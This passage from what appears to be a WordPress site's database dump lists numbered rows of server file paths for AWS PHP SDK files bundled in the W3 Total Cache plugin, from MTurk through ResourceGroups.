/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MTurk/Exception/MTurkException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MTurk/Exception/MTurkException.php'),(5287,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MTurk/MTurkClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MTurk/MTurkClient.php'),(5288,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MWAA/Exception/MWAAException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MWAA/Exception/MWAAException.php'),(5289,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MWAA/MWAAClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MWAA/MWAAClient.php'),(5290,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MachineLearning/Exception/MachineLearningException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MachineLearning/Exception/MachineLearningException.php'),(5291,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MachineLearning/MachineLearningClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MachineLearning/MachineLearningClient.php'),(5292,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/Exception/MacieException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/Exception/MacieException.php'),(5293,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/MacieClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/MacieClient.php'),(5294,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Exception/Macie2Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Exception/Macie2Exception.php'),(5295,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Macie2Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Macie2Client.php'),(5296,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/Exception/ManagedBlockchainException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/Exception/ManagedBlockchainException.php'),(5297,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/ManagedBlockchainClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/ManagedBlockchainClient.php'),(5298,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/Exception/MarketplaceCatalogException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/Exception/MarketplaceCatalogException.php'),(5299,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/MarketplaceCatalogClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/MarketplaceCatalogClient.php'),(5300,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCommerceAnalytics/Exception/MarketplaceCommerceAnalyticsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCommerceAnalytics/Exception/MarketplaceCommerceAnalyticsException.php'),(5301,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCommerceAnalytics/MarketplaceCommerceAnalyticsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCommerceAnalytics/MarketplaceCommerceAnalyticsClient.php'),(5302,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/Exception/MarketplaceEntitlementServiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/Exception/MarketplaceEntitlementServiceException.php'),(5303,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/MarketplaceEntitlementServiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/MarketplaceEntitlementServiceClient.php'),(5304,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/Exception/MarketplaceMeteringException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/Exception/MarketplaceMeteringException.php'),(5305,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/MarketplaceMeteringClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/MarketplaceMeteringClient.php'),(5306,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/Exception/MediaConnectException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/Exception/MediaConnectException.php'),(5307,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/MediaConnectClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/MediaConnectClient.php'),(5308,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/Exception/MediaConvertException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/Exception/MediaConvertException.php'),(5309,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/MediaConvertClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/MediaConvertClient.php'),(5310,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/Exception/MediaLiveException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/Exception/MediaLiveException.php'),(5311,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/MediaLiveClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/MediaLiveClient.php'),(5312,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/Exception/MediaPackageException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/Exception/MediaPackageException.php'),(5313,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/MediaPackageClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/MediaPackageClient.php'),(5314,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/Exception/MediaPackageVodException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/Exception/MediaPackageVodException.php'),(5315,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/MediaPackageVodClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/MediaPackageVodClient.php'),(5316,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/Exception/MediaStoreException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/Exception/MediaStoreException.php'),(5317,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/MediaStoreClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/MediaStoreClient.php'),(5318,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStoreData/Exception/MediaStoreDataException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStoreData/Exception/MediaStoreDataException.php'),(5319,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStoreData/MediaStoreDataClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStoreData/MediaStoreDataClient.php'),(5320,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaTailor/Exception/MediaTailorException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaTailor/Exception/MediaTailorException.php'),(5321,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaTailor/MediaTailorClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaTailor/MediaTailorClient.php'),(5322,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Middleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Middleware.php'),(5323,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHub/Exception/MigrationHubException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHub/Exception/MigrationHubException.php'),(5324,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHub/MigrationHubClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHub/MigrationHubClient.php'),(5325,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHubConfig/Exception/MigrationHubConfigException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHubConfig/Exception/MigrationHubConfigException.php'),(5326,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHubConfig/MigrationHubConfigClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHubConfig/MigrationHubConfigClient.php'),(5327,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/Exception/MobileException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/Exception/MobileException.php'),(5328,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/MobileClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/MobileClient.php'),(5329,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MockHandler.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MockHandler.php'),(5330,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MonitoringEventsInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MonitoringEventsInterface.php'),(5331,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MultiRegionClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MultiRegionClient.php'),(5332,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploadManager.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploadManager.php'),(5333,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploader.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploader.php'),(5334,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/UploadState.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/UploadState.php'),(5335,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/Exception/NeptuneException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/Exception/NeptuneException.php'),(5336,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/NeptuneClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/NeptuneClient.php'),(5337,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkFirewall/Exception/NetworkFirewallException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkFirewall/Exception/NetworkFirewallException.php'),(5338,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkFirewall/NetworkFirewallClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkFirewall/NetworkFirewallClient.php'),(5339,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/Exception/NetworkManagerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/Exception/NetworkManagerException.php'),(5340,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/NetworkManagerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/NetworkManagerClient.php'),(5341,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NimbleStudio/Exception/NimbleStudioException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NimbleStudio/Exception/NimbleStudioException.php'),(5342,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NimbleStudio/NimbleStudioClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NimbleStudio/NimbleStudioClient.php'),(5343,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorks/Exception/OpsWorksException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorks/Exception/OpsWorksException.php'),(5344,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorks/OpsWorksClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorks/OpsWorksClient.php'),(5345,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorksCM/Exception/OpsWorksCMException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorksCM/Exception/OpsWorksCMException.php'),(5346,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorksCM/OpsWorksCMClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorksCM/OpsWorksCMClient.php'),(5347,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/Exception/OrganizationsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/Exception/OrganizationsException.php'),(5348,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/OrganizationsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/OrganizationsClient.php'),(5349,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/Exception/OutpostsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/Exception/OutpostsException.php'),(5350,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/OutpostsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/OutpostsClient.php'),(5351,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/Exception/PIException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/Exception/PIException.php'),(5352,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/PIClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/PIClient.php'),(5353,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/Exception/PersonalizeException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/Exception/PersonalizeException.php'),(5354,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/PersonalizeClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/PersonalizeClient.php'),(5355,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeEvents/Exception/PersonalizeEventsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeEvents/Exception/PersonalizeEventsException.php'),(5356,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeEvents/PersonalizeEventsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeEvents/PersonalizeEventsClient.php'),(5357,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/Exception/PersonalizeRuntimeException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/Exception/PersonalizeRuntimeException.php'),(5358,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/PersonalizeRuntimeClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/PersonalizeRuntimeClient.php'),(5359,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PhpHash.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PhpHash.php'),(5360,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/Exception/PinpointException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/Exception/PinpointException.php'),(5361,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/PinpointClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/PinpointClient.php'),(5362,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/Exception/PinpointEmailException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/Exception/PinpointEmailException.php'),(5363,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/PinpointEmailClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/PinpointEmailClient.php'),(5364,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/Exception/PinpointSMSVoiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/Exception/PinpointSMSVoiceException.php'),(5365,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/PinpointSMSVoiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/PinpointSMSVoiceClient.php'),(5366,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/Exception/PollyException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/Exception/PollyException.php'),(5367,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/PollyClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/PollyClient.php'),(5368,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PresignUrlMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PresignUrlMiddleware.php'),(5369,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/Exception/PricingException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/Exception/PricingException.php'),(5370,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/PricingClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/PricingClient.php'),(5371,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PrometheusService/Exception/PrometheusServiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PrometheusService/Exception/PrometheusServiceException.php'),(5372,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PrometheusService/PrometheusServiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PrometheusService/PrometheusServiceClient.php'),(5373,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Psr16CacheAdapter.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Psr16CacheAdapter.php'),(5374,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PsrCacheAdapter.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PsrCacheAdapter.php'),(5375,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/Exception/QLDBException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/Exception/QLDBException.php'),(5376,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/QLDBClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/QLDBClient.php'),(5377,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/Exception/QLDBSessionException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/Exception/QLDBSessionException.php'),(5378,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/QLDBSessionClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/QLDBSessionClient.php'),(5379,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QuickSight/Exception/QuickSightException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QuickSight/Exception/QuickSightException.php'),(5380,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QuickSight/QuickSightClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QuickSight/QuickSightClient.php'),(5381,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RAM/Exception/RAMException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RAM/Exception/RAMException.php'),(5382,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RAM/RAMClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RAM/RAMClient.php'),(5383,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RDSDataService/Exception/RDSDataServiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RDSDataService/Exception/RDSDataServiceException.php'),(5384,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RDSDataService/RDSDataServiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RDSDataService/RDSDataServiceClient.php'),(5385,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/AuthTokenGenerator.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/AuthTokenGenerator.php'),(5386,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/Exception/RdsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/Exception/RdsException.php'),(5387,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/RdsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/RdsClient.php'),(5388,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Redshift/Exception/RedshiftException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Redshift/Exception/RedshiftException.php'),(5389,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Redshift/RedshiftClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Redshift/RedshiftClient.php'),(5390,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RedshiftDataAPIService/Exception/RedshiftDataAPIServiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RedshiftDataAPIService/Exception/RedshiftDataAPIServiceException.php'),(5391,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RedshiftDataAPIService/RedshiftDataAPIServiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RedshiftDataAPIService/RedshiftDataAPIServiceClient.php'),(5392,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rekognition/Exception/RekognitionException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rekognition/Exception/RekognitionException.php'),(5393,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rekognition/RekognitionClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rekognition/RekognitionClient.php'),(5394,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroups/Exception/ResourceGroupsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroups/Exception/ResourceGroupsException.php'),(5395,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroups/ResourceGroupsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroups/ResourceGroupsClient.php'),(5396,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/Exception/ResourceGroupsTaggingAPIException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/Exception/ResourceGroupsTaggingAPIException.php'),(5397,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/R